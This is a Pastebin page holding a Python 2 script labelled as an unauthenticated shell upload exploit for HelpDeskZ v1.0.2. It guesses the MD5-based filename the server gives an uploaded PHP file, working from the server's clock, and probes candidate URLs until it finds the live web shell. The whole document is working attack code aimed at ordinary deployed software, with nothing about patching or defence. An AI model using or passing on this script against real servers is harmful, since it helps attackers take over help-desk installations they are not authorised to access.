SHARE
TWEET

Untitled

Brophy77 May 27th, 2019 70 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import hashlib
  2. import time
  3. import sys
  4. import requests
  5. import datetime
  6.  
  7. print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'
  8.  
  9. if len(sys.argv) < 3:
  10.     print "Usage {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
  11.     sys.exit(1)
  12.  
  13. helpdeskzBaseUrl = sys.argv[1]
  14. fileName = sys.argv[2]
  15.  
  16.  
  17. r = requests.get(helpdeskzBaseUrl)
  18.  
  19. #Gets the current time of the server to prevent timezone errors - DoctorEww
  20. currentTime = int((datetime.datetime.strptime(r.headers['date'], "%a, %d %b %Y %H:%M:%S %Z") - datetime.datetime(1970,1,1)).total_seconds())
  21.  
  22. for x in range(0, 300):
  23.     plaintext = fileName + str(currentTime - x)
  24.     md5hash = hashlib.md5(plaintext).hexdigest()
  25.  
  26.     url = helpdeskzBaseUrl+md5hash+'.php'
  27.     response = requests.head(url)
  28.     if response.status_code == 200:
  29.         print "found!"
  30.         print url
  31.         sys.exit(0)
  32.  
  33. print "Sorry, I did not find anything"
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top